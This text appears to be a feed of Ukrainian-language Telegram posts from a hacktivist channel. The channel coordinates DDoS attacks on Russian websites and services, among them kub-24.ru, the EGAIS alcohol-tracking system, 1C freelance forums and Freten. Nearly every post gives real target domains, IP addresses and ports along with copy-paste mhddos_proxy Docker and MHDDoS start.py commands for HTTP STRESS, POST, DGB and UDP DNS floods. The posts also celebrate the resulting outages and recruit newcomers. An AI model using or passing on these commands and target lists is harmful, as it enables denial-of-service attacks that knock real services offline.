python3 start.py STRESS https://robot.kub-24.ru 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://kub-24.ru 6 1000 proxy.txt 10000 5000 true

python3 start.py POST https://dev.kub-24.ru/site/login 6 1000 proxy.txt 10000 5000 true
python3 start.py POST https://store.kub-24.ru/site/login 6 1000 proxy.txt 10000 5000 true

python3 start.py UDP 185.175.47.155:53 5000 10000 true python3 start.py UDP 188.68.203.5:53 5000 10000 true python3 start.py UDP 77.223.114.5:53 5000 10000 true python3 start.py UDP 188.68.203.10:53 5000 10000 true python3 start.py UDP 77.223.114.10:53 5000 10000 true Запускайте машини, ми продовжуємо😈
Mostrar todo...
Нам потрібні люди!💪 Якщо хочеш допомогти країні у війні з окупантами - є хороша можливість себе реалізувати, саме на кіберфронті. Певно, що ви чули про атаки на російські сайти. Це і є наша ціль. Нанести удар по інтернет простору загарбників. Приєднуйтесь і не хвилюйтесь, все що потрібно вас навчать наші експерти. Канал Гайдамак
Mostrar todo...
Доброго ранку, Гайдамаки!💪 Сьогодні 9 травня, тобто свято у рашистів. В цей день вони будуть свядкувати, тому даю вам можливість додати іскри в цей "празднік войнів", хоча по факту— зараз вони гордяться людьми, які гвалтували молодих дівчат, вбивали мирне населення і обстрілювали звичайні будинки, лікарні, школи... Я навіть не хочу малювати ці картини в себе в голові, це жах🤬 Тому сьогодні ми продовжуємо працювати по бізнес сектору РФ. Атака на КУБ24! Якщо коротко, доволі впливова фінансова організація. Що ж, не всі зможуть прийти на "Парад Победы" — як мінімум сис. адміни серверів і бізнес клієнти компанії точно👌 finmodel.kub-24.ru mts.kub-24.ru robot.kub-24.ru dev.kub-24.ru store.kub-24.ru kub-24.ru 92.42.15.197 [21/TCP, 80/TCP, 443/TCP, 8083/TCP] —> сайт* 92.42.15.197 [25/smtp, 110/pop3, 143/Imap, 465/ssl-smtp, 587/smtp, 993/ss;-smtp, 995/ssl-pop3, 2525/smtp] —> пошта* 188.68.203.5 77.223.114.5 188.68.203.10 77.223.114.10 [53/UDP] —> DNS-servers* Команда для Docker: docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://finmodel.kub-24.ru https://mts.kub-24.ru https://robot.kub-24.ru https://dev.kub-24.ru/site/login https://kub-24.ru https://store.kub-24.ru/site/login -t 2000 --rpc 2000 -p 900 --http-methods STRESS POST --table docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table Команда для mhddos_proxy: python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table python runner.py https://finmodel.kub-24.ru https://mts.kub-24.ru https://robot.kub-24.ru https://dev.kub-24.ru/site/login https://kub-24.ru https://store.kub-24.ru/site/login -t 2000 --rpc 2000 -p 900 --http-methods STRESS POST --table python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table Команди для MHDDoS:
python3 start.py STRESS https://finmodel.kub-24.ru 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://mts.kub-24.ru 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://robot.kub-24.ru 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://kub-24.ru 6 1000 proxy.txt 10000 5000 true

python3 start.py POST https://dev.kub-24.ru/site/login 6 1000 proxy.txt 10000 5000 true
python3 start.py POST https://store.kub-24.ru/site/login 6 1000 proxy.txt 10000 5000 true

python3 start.py UDP 188.68.203.5:53 5000 10000 true python3 start.py UDP 77.223.114.5:53 5000 10000 true python3 start.py UDP 188.68.203.10:53 5000 10000 true python3 start.py UDP 77.223.114.10:53 5000 10000 true Зробіть свято окупантам. Нехай відчують весь біль, який вони завдали нам на собі!
Mostrar todo...
Доброго дня, Гайдамаки, у нас зявились технічні негаразди, тому ціль не змінюється, поки що атаку продовжуємо на ЕГИАС. Нові цілі будуть завтра вранці, тому прошу зібратись максимальними силами, так як на 9 травня хочу зробити "подарунок" рашистам.
Mostrar todo...
Доброї ночі, Гайдамаки, цей пост буде більш розмовного характеру💡 Сьогодні ми продовжили атаку на ЕГАИС, але поки що можу сказати одне — їх сервери були довго вимкнені і взагалі відгороджені від інтернету, так сказати, "закрились на ремонт", тим часом закрились ще два заводи-пивоварні, так як продукція стоїть на складах, а вивезти її не можуть... Поки що я слідкую за ситуацією там і вже вранці точно зможу сказати, що атакуємо далі, думаю, що б такого цікавого підготувати рашистам на 9 травня😏 А зараз відпочивайте) Також, хочу сказати, що ми готуємо автоматичну програму для запуску кібератак на Windows (це для тих, хто боїться запускати консоль/термінал). Все, що вам буде потрібно зробити, — це запустити ".exe" файл. Все. Атака буде йти. Більш детальнішу інформацію ви отримаєте згодом, але сам факт полягає в тому, що атакувати зможуть навіть люди, які далекі від ІТ і не знають "шо куди жати і шо це за команди якісь на каналі". Навіть ваша бабуся запустить атаку😁 Для тих, хто з комп'ютером взаємодіє частіше — я закінчую працювати над інструкцією ддос "DDoS від А до Я", основний інструмент — це mhddos і його модифікації. Так як це найпотужніший інструмент на даний момент. ЗБІР о 12.00!
Mostrar todo...
​​Доброго дня Гайдамаки! Щодо наших перемог на кібер-фронті. Як і хлопці у ЗСУ, ми не даємо ворожим сис.адмінам навіть спокійно піти подивитись "Zомбо-ящик". Бідолаги змушені вдаватися до крайнощів. Трішки про досягнення: Сервіс Фертен два дні поспіль відчував себе, як я після весілля кума брата моєї сестри. Звісно вони намагалися вчинити певні дії по реабілітації, але, дивлячись на результат, можемо зробити висновок, що "Бетаргін" їм не допоміг. Тому поколошматили ми їх досить сильно. Тим часом, ІТ армія орків сидить на березах, ловлячи останні Мб інтернету, ми знову оголошуємо кіновечір. Так як Доктор Стрендж вже зайняв своє місце у складі Хмельницького ТРО, його на кіно-вечорі сьогодні не буде. Тому пропонуємо вам запастися смаколиками та провести вечір за переглядом фільму "Сноуден" Як і зазвичай, перегляд буде відбуватись у перерві між вибором цілей ЗБІР СЬОГОДНІ 20:30
Mostrar todo...
Приєднатись до перегляду!
Доброго дня, Гайдамаки і Гайдамачки!✨ З вечора і всю ніч ми мучили форум і фріланс біржу спеціалістів з 1С, але тепер настав час переключитись на іншу ціль. Думаю ви вже бачили новини, що в рашистів проблеми з Алкоголем через непрацюючу систему "ЕГАИС". Все просто — це постарались наші колеги по цеху, але вони не атакували DNS сервери. Тому сьогодні допоможемо їм в цьому ділі. egais.ru service.egais.ru check.egais.ru documents-utm.egais.ru 212.164.137.246 [443/TCP] cheques-utm.egais.ru 146.120.90.247 [443/TCP] queries-utm.egais.ru 146.120.90.245 [443/TCP] DNS сервери ЕГАИС: 91.217.20.20 91.217.21.20 89.104.93.31 193.232.146.1 [53/UDP] 194.67.73.79 [53/UDP, 111/UDP] Команда для Docker: docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table (вище пріорітетна команда для атаки)** docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://egais.ru https://service.egais.ru https://check.egais.ru https://documents-utm.egais.ru https://cheques-utm.egais.ru https://queries-utm.egais.ru -t 2000 --rpc 2000 -p 900 --http-methods STRESS POST --table Команда для mhddos_proxy: python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table (вище пріорітетна команда для атаки)** python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table python runner.py https://egais.ru https://service.egais.ru https://check.egais.ru https://documents-utm.egais.ru https://cheques-utm.egais.ru https://queries-utm.egais.ru -t 2000 --rpc 2000 -p 900 --http-methods STRESS POST --table Команди для MHDDoS:
python3 start.py UDP 91.217.20.20:53 5000 10000 true
python3 start.py UDP 91.217.21.20:53 5000 10000 true
python3 start.py UDP 89.104.93.31:53 5000 10000 true
python3 start.py UDP 89.104.93.31:53 5000 10000 true
python3 start.py UDP 193.232.146.1:53 5000 10000 true
python3 start.py UDP 194.67.73.79:53 5000 10000 true
python3 start.py UDP 194.67.73.79:111 5000 10000 true
Нагадую, наша ціль зосередитись поки що саме на UDP таргетах, бажаю всім гарно провести час👌
Mostrar todo...
Доброго вечора, кібервоїни!⚔️ Ми атакували Фретен два дні підряд. Вони сховались за DDoS-Guard захистом. Пробити його нам вдалось, але тільки на кілька годин. Зараз сервіс функціонує нормально, але покошмарили ми їх знатно😈 Як не як, сервери не працювали, і потік грошей було тимчасово зупинено. Останнім часом всі угрупування ddos атакують сервіси 1С, зараз атаку локалізовано на "ЕГАИС". Для вирішення проблем на серверах 1С потрібні спеціалісти, що ж... так як наш вектор атаки це фріланс біржі, зокрема і бізнес сектор рашистів, ми атакуємо фріланс біржу саме спеціалістів для 1С. 1cl.su 1clancer.ru 213.108.130.76 [22/TCP, 80/TCP, 443/TCP-ssl, 3001/TCP] forum-1c.ru lancer.forum-1c.ru 176.113.82.119 —> форум [443/TCP-ssl] Команда для Docker: docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://1cl.su/ https://1clancer.ru/ https://lancer.forum-1c.ru/ https://forum-1c.ru/ -t 2100 --rpc 2000 -p 900 --http-methods STRESS POST --table Команда для mhddos_proxy: python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table python runner.py https://1cl.su/ https://1clancer.ru/ https://lancer.forum-1c.ru/ https://forum-1c.ru/ -t 2100 --rpc 2000 -p 900 --http-methods STRESS POST --table Команди для MHDDoS:
python3 start.py STRESS https://1cl.su/ 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://1clancer.ru/ 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://lancer.forum-1c.ru/ 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://forum-1c.ru/ 6 1000 proxy.txt 10000 5000 true
DNS сервери висять на Яндекс клауді, а поштові захищені, тому їх не атакуємо. Ціль — сам сайт👍
Mostrar todo...
Доброго вечора, Гайдамаки! Продовжуємо атакувати Фретен біржу. Сервіс працює, але з перебоями. Іноді буває, що ддос гуард вічно грузиться, але ніяк не прогрузиться, іноді сайт з'являється, але без CSS... Коротко кажучи, ми молодці, атаку не зупиняємо, результати дуже хороші😁 Також зараз не рекомендую ігнорувати тривоги, кацапи бушують...😓 І не розповсюджуйте інформацію "шо де в кого бахнуло", я звертаюся до всіх вас, так як ви перебуваєте в багатьох чатах, і навіювати паніку не потрібно.
Mostrar todo...
Доброго вечора, Гайдамаки! До цього моменту ми успішно атакували нашу ціль, але зараз кацапи сховались за DDoS-Guard захистом, також змінили поштовий айпі. Але не страшно, це нам не заважає бити їх далі, але вже методом DGB (буде дуже важко), а для пошти зміним айпі в таргетах. Все з українською любовю😘 Фретен, готуйтесь, буде жарко! Це вам за обстріляні наші міста, сьогодні🤬 (друзі, не ігноруйте тривоги) freten.ru robroy.ru mail.freten.ru mail.robroy.ru [ddos-guard] —> сайт* 82.202.172.70 [21/TCP, 22/TCP, 25/smtp, 110/pop3, 143/imap, 465/ssl/smtp, 587/smtp, 993/ssl/imap, 995/ssl/pop3, 1500/TCP] [53/UDP, 123/UDP] 82.146.43.2 94.250.248.160 [53/UDP] —> DNS-servers* Команда для Docker: docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://freten.ru https://robroy.ru -t 2200 --rpc 2000 -p 900 --http-methods DGB --table Команда для mhddos_proxy: python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table python runner.py https://freten.ru https://robroy.ru -t 2200 --rpc 2000 -p 900 --http-methods DGB --table Команди для MHDDoS:
python3 start.py UDP 82.202.172.70:53 5000 10000 true
python3 start.py UDP 94.250.248.160:53 5000 10000 true
python3 start.py UDP 82.146.43.2:53 5000 10000 true

python3 start.py UDP 82.202.172.70:123 5000 10000 true
(тут синхронізація часу(123 порт), тому не пріорітетна команда)* python3 start.py DGB https://freten.ru 6 1000 proxy.txt 10000 5000 true python3 start.py DGB https://robroy.ru 6 1000 proxy.txt 10000 5000 true Спробуємо пробити захист - нам потрібно, щоб сервіс лежав, сил багато для цього потрібно, бо бити такі барєри було завжди не легкою задачою, тим більше ми вперше атакуємо таким способом.
Mostrar todo...
Без коментарів.... Перша біржа вже лежить, тримаємо в такому прекрасному стані її далі, потім атака на іншу😉👌
Mostrar todo...